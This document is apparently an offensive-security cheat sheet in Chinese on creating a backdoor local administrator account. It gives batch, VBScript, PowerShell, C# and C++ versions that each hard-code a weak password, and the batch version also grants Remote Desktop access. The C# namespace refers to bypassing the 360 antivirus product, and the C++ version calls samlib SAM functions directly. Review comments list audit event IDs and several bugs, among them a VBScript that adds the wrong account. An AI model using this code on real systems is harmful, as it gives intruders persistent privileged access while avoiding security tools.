# 新建用户

新建本地用户，并为其添加管理员组及远程桌面访问权限

命令行：

```
rem Creates the local account, then adds it to two built-in local groups.
rem /y suppresses the interactive confirmation net user may prompt for.
rem Each line is a write to the local SAM; with account-management auditing
rem enabled these surface in the Security log (4720 for the account creation,
rem 4732 for each local-group membership change).
net user qwqdanchun password /add /y
net localgroup administrators qwqdanchun /add
net localgroup "remote desktop users" qwqdanchun /add
```

VBScript（原文标注为 Powershell）：

```
' Creates a local account through the WinNT ADSI provider, then adds a member
' to the local Administrators group. Note the two steps do not agree on a
' name: the account created is "qwqdanchun", the member added is "admin".
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","qwqdanchun")
od.SetPassword "password"
od.SetInfo
' NOTE(review): `user` is never assigned in this script, so the second
' argument is Empty; "/admin" is also not the account created above, and
' `of` is never used afterwards.
Set of=GetObject(os&"/admin",user)
' NOTE(review): adds "admin" to Administrators, not "qwqdanchun".
oe.add os&"/admin"
```

Powershell（另一个版本）：

```
# Create a local account and place it in the local Administrators group.
# Both steps change the local SAM; with account-management auditing on they
# appear in the Security log (4720 for the creation, 4732 for the group add).
$secret = ConvertTo-SecureString "password" -AsPlainText -Force
$newUser = @{
    Name        = "qwqdanchun"
    Password    = $secret
    FullName    = "test account"
    Description = "test user."
}
New-LocalUser @newUser
Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun"
```

c#（使用系统 API 函数）：

```csharp
using System;
using System.Runtime.InteropServices;
namespace Bypass360Add
{
    /// <summary>
    /// Program entry point. Despite the class name nothing here bypasses UAC:
    /// the Netapi32 calls made through <see cref="LocalGroupUserHelper"/> only
    /// succeed from an already-privileged process (typically an elevated
    /// member of Administrators).
    /// </summary>
    public static class BypassUAC_csharp
    {
        // Hard-coded account details used by Main.
        private const string NewUserName = "qwqdanchun";
        private const string NewUserPassword = "password";
        private const string TargetGroup = "Administrators";

        [DllImport("kernel32.dll")]
        static extern void ExitProcess(uint uExitCode);

        /// <summary>
        /// Creates the local account, adds it to the Administrators group and
        /// then terminates the process through the native ExitProcess.
        /// </summary>
        /// <param name="args">Command-line arguments; not read.</param>
        public static void Main(string[] args)
        {
            var helper = new LocalGroupUserHelper();
            // serverName null targets the local machine; comment null = no description.
            helper.AddUser(null, NewUserName, NewUserPassword, null);
            helper.GroupAddMembers(null, TargetGroup, NewUserName);
            // Exit code 1 is returned unconditionally, even when both calls
            // succeeded, and the native ExitProcess bypasses the CLR's orderly shutdown.
            ExitProcess(1);
        }
    }
    /// <summary>
    /// Thin P/Invoke wrapper over two Netapi32 account-management calls:
    /// NetUserAdd (information level 1) and NetLocalGroupAddMembers (level 3).
    /// Both write to the SAM of the target machine and need a privileged caller;
    /// with account-management auditing enabled the changes appear in the
    /// Security log (event 4720 for the new account, 4732 for the group add).
    /// </summary>
    public class LocalGroupUserHelper
    {
        // NetUserAdd(servername, level, buf, parm_err) returns NET_API_STATUS,
        // 0 (NERR_Success) on success. The native parm_err is a pointer (LPDWORD);
        // it is declared int here and always passed 0, i.e. NULL — an IntPtr
        // would be the pointer-sized, more faithful declaration.
        [DllImport("Netapi32.dll")]
        extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
        // NetLocalGroupAddMembers(servername, groupname, level, buf, totalentries):
        // level 3 means buf holds LOCALGROUP_MEMBERS_INFO_3 entries addressed by
        // name; totalentries is the entry count (always 1 below).
        [DllImport("Netapi32.dll")]
        extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
         int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
        // Managed mirror of the native LOCALGROUP_MEMBERS_INFO_3 (a single LPWSTR).
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct LOCALGROUP_MEMBERS_INFO_3
        {
            public string domainandname; // native lgrmi3_domainandname: "DOMAIN\name" or a bare local account name
        }
        // Managed mirror of the native USER_INFO_1. With sequential layout the
        // field ORDER is what must match the native struct, not the field names;
        // "comment" sits where the native usri1_comment is.
       [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct USER_INFO_1
        {
            public string usri1_name;
            public string usri1_password;
            public int usri1_password_age; // not set by AddUser
            public int usri1_priv;         // USER_PRIV_* privilege level
            public string usri1_home_dir;
            public string comment;         // native usri1_comment
            public int usri1_flags;        // UF_* account flags; left 0 by AddUser (NOTE(review): the NetUserAdd docs describe UF_SCRIPT as required — check if adds fail)
            public string usri1_script_path;
        }
        /// <summary>
        /// Creates a user account via NetUserAdd at information level 1.
        /// Failure is only reported to the console; the NET_API_STATUS code is discarded.
        /// </summary>
        /// <param name="serverName">Target machine; null means the local machine.</param>
        /// <param name="userName">Name of the account to create.</param>
        /// <param name="password">Initial password, handed to the API in clear text.</param>
        /// <param name="strComment">Optional account comment; may be null.</param>
        public void AddUser(string serverName, string userName, string password, string strComment)
        {
            USER_INFO_1 NewUser = new USER_INFO_1(); // create a USER_INFO_1 instance
            NewUser.usri1_name = userName; // Allocates the username
            NewUser.usri1_password = password; // allocates the password
            NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
            NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
            NewUser.comment = strComment; // Comment on the User
            NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
            if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) // a non-zero NET_API_STATUS means the add failed
            {
                Console.WriteLine("Error Adding User");
            }
        }
        /// <summary>
        /// Adds one account, by name, to a local group via NetLocalGroupAddMembers
        /// at information level 3. Failure is only reported to the console.
        /// </summary>
        /// <param name="serverName">Target machine; null means the local machine.</param>
        /// <param name="groupName">Local group to modify.</param>
        /// <param name="userName">Account name to add ("DOMAIN\name" or a local name).</param>
        public void GroupAddMembers(string serverName, string groupName, string userName)
        {
            LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
            NewMember.domainandname = userName;
            if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) // a non-zero NET_API_STATUS means the add failed
            {
                Console.WriteLine("Error Adding Group Member"); 
            }
        }
    }
}
```

c++(重写AddUser)：

```cpp
#include "ApiAddUser.h"



// Creates a local account by calling the SAM client exports of samlib.dll
// (SamConnect / SamOpenDomain / SamCreateUser2InDomain / SamSetInformationUser)
// directly instead of Netapi32's NetUserAdd. The pSam* / pRtl* function-pointer
// types are presumably declared in ApiAddUser.h (not shown here).
// NOTE(review): every NTSTATUS below is stored in Status and then overwritten
// without ever being checked; the GetProcAddress results are called without a
// NULL test; DomainInfo is dereferenced even if LsaQueryInformationPolicy
// failed; and no handle (ServerHandle, DomainHandle, UserHandle, hPolicy), LSA
// buffer or loaded module is released before return.
// NOTE(review): the account is created by the SAM server, so the same SAM
// change — and, with account-management auditing on, the same Security-log
// event 4720 — is expected whether the client uses Netapi32 or samlib; confirm
// in a lab rather than assuming otherwise.
int wmain(int argc, wchar_t* argv[])
{
    UNICODE_STRING UserName;
    UNICODE_STRING PassWord;
    HANDLE ServerHandle = NULL;
    HANDLE DomainHandle = NULL;
    HANDLE UserHandle = NULL;
    ULONG GrantedAccess;
    ULONG RelativeId;
    NTSTATUS Status = NULL;        // NULL assigned to an integer status; 0 is what is meant
    HMODULE hSamlib = NULL;
    HMODULE hNtdll = NULL;
    HMODULE hNetapi32 = NULL;      // declared but never loaded or used
    LSA_HANDLE hPolicy = NULL;
    LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
    USER_ALL_INFORMATION uai = { 0 };


    // Resolve the SAM client exports and RtlInitUnicodeString at run time.
    // Neither LoadLibraryA result is checked for NULL.
    hSamlib = LoadLibraryA("samlib.dll");
    hNtdll = LoadLibraryA("ntdll");

    pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
    pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
    pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
    pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
    pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject"); // resolved but never called
    pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    // Account name and password are both the hard-coded literal L"Admin".
    RtlInitUnicodeString(&UserName, L"Admin");
    RtlInitUnicodeString(&PassWord, L"Admin");

    // Connect to the local SAM server, then obtain the account-domain SID from
    // LSA so the domain can be opened. (The stray second ';' is harmless.)
    Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);;
    Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
    Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);

    // DomainInfo is used here without checking that the query above succeeded.
    Status = SamOpenDomain(ServerHandle, 
        DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS, 
        DomainInfo->DomainSid, 
        &DomainHandle);

    // Create a normal user account and keep a handle with full access on it.
    Status = SamCreateUser2InDomain(DomainHandle,
        &UserName,
        USER_NORMAL_ACCOUNT,
        USER_ALL_ACCESS | DELETE | WRITE_DAC,
        &UserHandle,&GrantedAccess,&RelativeId);

    // The clear-text password is placed in uai.NtPassword and flagged via
    // NtPasswordPresent / USER_ALL_NTPASSWORDPRESENT; no other USER_ALL_* field
    // is populated.
    RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
    uai.NtPasswordPresent = TRUE;
    uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;


    Status = SamSetInformationUser(UserHandle,
        UserAllInformation,
        &uai);

    // Returns 0 regardless of Status; argc/argv are never read.
    return 0;
}
```


